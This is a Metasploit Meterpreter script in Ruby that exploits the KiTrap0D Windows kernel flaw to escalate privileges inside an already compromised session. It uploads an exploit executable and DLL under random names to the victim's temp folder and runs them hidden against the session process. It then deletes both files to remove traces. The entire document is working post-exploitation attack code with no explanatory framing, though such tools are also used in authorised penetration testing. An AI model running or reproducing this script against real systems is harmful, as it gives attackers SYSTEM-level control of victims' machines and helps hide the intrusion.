# $Id$

#
# Meterpreter script for exploiting the KiTrap0D flaw
# using Tavis Ormandy's PoC
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
	"-h"  => [ false,  "This help menu"]
)


#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
	case opt
	when "-h"
		print_line(opts.usage)
		raise Rex::Script::Completed
	end
end


# Exec a command and return the results
def m_exec(session, cmd)
	r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
	b = ""
	while(d = r.channel.read)
		b << d
	end
	r.channel.close
	r.close
	b
end
if client.platform =~ /win32|win64/
	# Handle exceptions in the getuid() call
	begin
		print_status("Currently running as " + client.sys.config.getuid)
		print_line("")
	rescue ::Rex::Post::Meterpreter::RequestError
	end

	print_status("Loading the vdmallowed executable and DLL from the local system...")
	based = ::File.join(Msf::Config.install_root, "data", "exploits", "kitrap0d")
	exp   = ::File.join(based, "vdmallowed.exe")
	dll   = ::File.join(based, "vdmexploit.dll")

	expdata = ""
	::File.open(exp, "rb") do |fd|
		expdata = fd.read(fd.stat.size)
	end

	dlldata = ""
	::File.open(dll, "rb") do |fd|
		dlldata = fd.read(fd.stat.size)
	end

	tempdir = client.fs.file.expand_path("%TEMP%")
	tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
	print_status("Uploading vdmallowed to #{tempexe}...")
	fd = client.fs.file.new(tempexe, "wb")
	fd.write(expdata)
	fd.close

	tempdir = client.fs.file.expand_path("%TEMP%")
	tempdll = tempdir + "\\" + "vdmexploit.dll"
	print_status("Uploading vdmallowed to #{tempdll}...")
	fd = client.fs.file.new(tempdll, "wb")
	fd.write(dlldata)
	fd.close

	server = client.sys.process.open

	print_status("Escalating our process (PID:#{server.pid})...")
	print_line("")

	tempdrive = tempdir.split(':')[0]
	data = m_exec(client, "cmd.exe /c #{tempdrive}: & cd \"#{tempdir}\" & #{tempexe} #{server.pid}")
	print_line(data)

	print_status("Deleting files...")
	client.fs.file.rm(tempexe)
	client.fs.file.rm(tempdll)

	# Handle exceptions in the getuid() call
	begin
		print_status("Now running as " + client.sys.config.getuid)
	rescue ::Rex::Post::Meterpreter::RequestError
	end
else
	print_error("This version of Meterpreter is not supported with this Script!")
	raise Rex::Script::Completed
end